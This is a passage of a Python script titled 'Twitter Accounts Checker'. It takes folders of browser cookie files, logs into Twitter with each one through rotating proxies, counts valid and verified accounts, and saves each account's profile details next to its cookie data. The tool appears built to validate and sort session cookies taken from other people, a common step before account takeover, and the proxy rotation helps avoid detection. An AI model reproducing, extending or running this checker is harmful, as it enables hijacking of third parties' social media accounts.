+ protocol = 'socks5' + rest = line + + # Check for auth + username = None + password = None + + if '@' in rest: + auth, host_port = rest.rsplit('@', 1) + if ':' in auth: + username, password = auth.split(':', 1) + else: + host_port = rest + + # Parse host:port + if ':' in host_port: + host, port = host_port.rsplit(':', 1) + port = int(port) + else: + continue + + # Determine proxy type + protocol = protocol.lower() + if protocol in ['socks5', 'socks', 'socks5h']: + proxy_type = PROXY_TYPE_SOCKS5 + elif protocol in ['http', 'https']: + proxy_type = PROXY_TYPE_HTTP + else: + continue + + proxy = Proxy( + host=host, + port=port, + proxy_type=proxy_type, + username=username, + password=password + ) + + proxies.append(proxy) + + except Exception: + continue + + if proxies: + print(f"✓ Loaded {len(proxies)} proxies from file") + + return proxies + + +def read_cookies_file(file_path: str) -> str: + """ + Read cookies from file and convert to tweety format + + Args: + file_path: Path to cookies file (Netscape or JSON format) + + Returns: + Cookie string ready for tweety + """ + path = Path(file_path) + + if not path.exists(): + return None + + try: + content = path.read_text(encoding='utf-8') + except Exception: + return None + + # Clean the content first + content = clean_cookie_content(content) + + if not content: + return None + + # Try to detect format and convert + cookies_dict = {} + + # Try JSON first + try: + cookies_dict = json_to_dict(content) + except json.JSONDecodeError: + # Try Netscape format + try: + cookies_dict = netscape_to_dict(content) + except Exception: + return None + + if not cookies_dict: + return None + + return dict_to_cookie_string(cookies_dict) + + +def scan_cookies_directory(dir_path: str) -> List[Path]: + """ + Scan directory for cookie files (.json and .txt) + + Args: + dir_path: Path to directory with cookies or single file + + Returns: + List of Path objects to cookie files + """ + path = Path(dir_path).expanduser().resolve() + + if not path.exists(): + # Try relative to current directory + path = Path.cwd() / dir_path + if not path.exists(): + raise FileNotFoundError(f"Path not found: {dir_path}") + + # If it's a file, return it directly + if path.is_file(): + return [path] + + # If it's a directory, scan for cookie files + cookie_files = [] + + for ext in ['*.json', '*.txt']: + cookie_files.extend(path.glob(ext)) + + return sorted(cookie_files) + + +async def authenticate_twitter(cookies: Union[str, Dict], proxy: Optional[Proxy] = None) -> TwitterAsync: + """ + Authenticate to Twitter using cookies + + Args: + cookies: Cookie string or dictionary + proxy: Optional proxy configuration + + Returns: + Authenticated TwitterAsync instance + """ + print(f"\n🔐 Authenticating with Twitter...") + + if proxy: + app = TwitterAsync("temp_session", proxy=proxy) + else: + app = TwitterAsync("temp_session") + + await app.load_cookies(cookies) + + return app + + +def save_account_info(user, cookie_file: Path, output_dir: Path, cleaned_cookies: str = None): + """ + Save account information to text file and copy cookie file + + Args: + user: User object from tweety + cookie_file: Original cookie file path + output_dir: Output directory (results/) + cleaned_cookies: Cleaned cookie content (optional) + """ + output_dir.mkdir(exist_ok=True) + + # Create filename based on username + username = user.username + timestamp = datetime.now().strftime("%Y%m%d_%H%M%S") + + # Save account info + info_file = output_dir / f"{username}_{timestamp}_info.txt" + + # Check for verification type + verified_type = None + verified_label = None + + if isinstance(user, dict): + verified_type = user.get('verified_type') or user.get('ext_verified_type') + verified_label = user.get('verified_label') + + if 'legacy' in user and isinstance(user['legacy'], dict): + if not verified_type: + verified_type = user['legacy'].get('verified_type') + + if 'ext_is_blue_verified' in user: + if user['ext_is_blue_verified']: + verified_type = verified_type or 'Blue' + + # Use cleaned cookies if provided, otherwise read original + if cleaned_cookies: + cookie_content = cleaned_cookies + else: + cookie_content = cookie_file.read_text(encoding='utf-8') + + # Format verification info + verification_parts = [] + if user.verified: + verification_parts.append("Verified: Yes") + if verified_type: + verification_parts.append(f"Type: {verified_type}") + if verified_label: + verification_parts.append(f"Label: {verified_label}") + else: + verification_parts.append("Verified: No") + + verification_line = " | ".join(verification_parts) + + # Format created date + try: + if isinstance(user.created_at, str): + # Parse and reformat date + from dateutil import parser + created_date = parser.parse(user.created_at) + created_str = created_date.strftime("%d.%m.%Y %H:%M") + else: + created_str = user.created_at.strftime("%d.%m.%Y %H:%M") + except: + created_str = str(user.created_at) + + # Format info + info_lines = [ + "=" * 80, + f"Checked: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}", + "", + f"ID: {user.id} | Name: {user.name} | Username: @{username}", + f"Followers: {user.followers_count:,} | Following: {user.friends_count:,}", + f"Tweets: {user.statuses_count:,} | Likes: {user.favourites_count:,}", + verification_line, + f"Created: {created_str}", + f"Profile: https://twitter.com/{username}", + "", + f"Cookie file: {cookie_file.absolute()}", + "", + "=" * 80, + cookie_content, + ] + + # Write to file + info_file.write_text('\n'.join(info_lines), encoding='utf-8') + + return info_file + + +async def check_account(cookie_file: Path, proxies: List[Proxy], output_dir: Path, semaphore: asyncio.Semaphore): + """ + Check single account asynchronously + + Args: + cookie_file: Path to cookie file + proxies: List of available proxies + output_dir: Output directory + semaphore: Semaphore for concurrency control + + Returns: + Tuple of (success: bool, verified: bool, error_msg: str) + """ + async with semaphore: + try: + # Read cookies + try: + cookies_string = read_cookies_file(str(cookie_file)) + + if not cookies_string: + return (False, False, "Failed to parse cookie file") + + # Get cleaned cookie content for saving + cleaned_content = clean_cookie_content(cookie_file.read_text(encoding='utf-8')) + + except Exception as e: + return (False, False, f"Failed to read cookies: {e}") + + # Select random proxy if available + proxy = random.choice(proxies) if proxies else None + + # Authenticate + try: + app = await authenticate_twitter(cookies_string, proxy) + except Exception as e: + return (False, False, f"Authentication error: {e}") + + # Check if successful + try: + if app.me: + user = app.me + is_verified = user.verified + + # Save results + try: + info_file = save_account_info(user, cookie_file, output_dir, cleaned_content) + except Exception as e: + pass + + return (True, is_verified, f"@{user.username}") + else: + return (False, False, "Authentication failed - invalid cookies") + except Exception as e: + return (False, False, f"Error processing user info: {e}") + + except Exception as e: + return (False, False, f"Unexpected error: {e}") + + +async def main(): + """Main function""" + + print("=" * 60) + print("Twitter Accounts Checker") + print("=" * 60) + + # Check arguments + if len(sys.argv) < 2: + print("\nUsage: python twitter_auth_cookies.py [proxy_file]") + print("\nArguments:") + print(" cookies_dir - Directory with cookie files (.json/.txt) or single file") + print(" proxy_file - Optional file with proxies (one per line)") + print("\nProxy format:") + print(" socks5://127.0.0.1:1080") + print(" http://user:pass@proxy.com:8080") + print("\nExamples:") + print(" python twitter_auth_cookies.py cookies/") + print(" python twitter_auth_cookies.py cookies/ proxies.txt") + print(" python twitter_auth_cookies.py single_cookie.json proxies.txt") + sys.exit(1) + + cookies_path = sys.argv[1] + proxy_file = sys.argv[2] if len(sys.argv) > 2 else None + + # Output directory + output_dir = Path("results") + output_dir.mkdir(exist_ok=True) + + try: + # Scan for cookie files + print(f"\n📂 Scanning for cookies in: {cookies_path}") + cookie_files = scan_cookies_directory(cookies_path) + + if not cookie_files: + print("❌ No cookie files found (.json or .txt)") + sys.exit(1) + + print(f"✓ Found {len(cookie_files)} cookie file(s)") + + # Load proxies if provided + proxies = [] + if proxy_file: + print(f"\n🌐 Loading proxies from: {proxy_file}") + proxies = read_proxy_file(proxy_file) + + if not proxies: + print("⚠️ No valid proxies found, continuing without proxy") + + # Process each cookie file + print(f"\n🔍 Starting account checks...") + print("=" * 60) + + # Create semaphore for concurrency control (5 concurrent checks) + semaphore = asyncio.Semaphore(5) + + # Create tasks for all accounts + tasks = [] + for cookie_file in cookie_files: + task = check_account(cookie_file, proxies, output_dir, semaphore) + tasks.append((cookie_file, task)) + + # Process all accounts concurrently + successful = 0 + failed = 0 + verified_count = 0 + + for i, (cookie_file, task) in enumerate(tasks, 1): + print(f"\n[{i}/{len(cookie_files)}] Checking: {cookie_file.name}") + + success, verified, msg = await task + + if success: + print(f" ✅ Success: {msg}") + if verified: + print(f" Verified: Yes") + verified_count += 1 + successful += 1 + else: + print(f" ❌ {msg}") + failed += 1 + + # Summary + print("\n" + "=" * 60) + print("Summary:") + print("=" * 60) + print(f"Total accounts: {len(cookie_files)}") + print(f"✅ Valid: {successful}") + print(f"❌ Failed: {failed}") + print(f"✓ Verified: {verified_count}") + print(f"\n📁 Results saved to: {output_dir.absolute()}/") + print("=" * 60) + + # Save summary to file + summary_file = output_dir / f"summary_{datetime.now().strftime('%Y%m%d_%H%M%S')}.txt" + summary_lines = [ + "=" * 80, + "Twitter Checker Summary", + "=" * 80, + f"Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}", + "", + "Results:", + f" Total accounts checked: {len(cookie_files)}", + f" Valid accounts: {successful}", + f" Invalid accounts: {failed}", + f" Verified accounts: {verified_count}", + "", + "Configuration:", + f" Proxies loaded: {len(proxies) if proxies else 0}", + f" Cookie files: {len(cookie_files)}", + "", + "=" * 80, + ] + summary_file.write_text('\n'.join(summary_lines), encoding='utf-8') + print(f"\n📊 Summary saved to: {summary_file.name}") + + except FileNotFoundError as e: + print(f"\n❌ Error: {e}") + sys.exit(1) + except Exception as e: + print(f"\n❌ Unexpected error: {e}") + import traceback + traceback.print_exc() + sys.exit(1) + + +if __name__ == "__main__": + asyncio.run(main())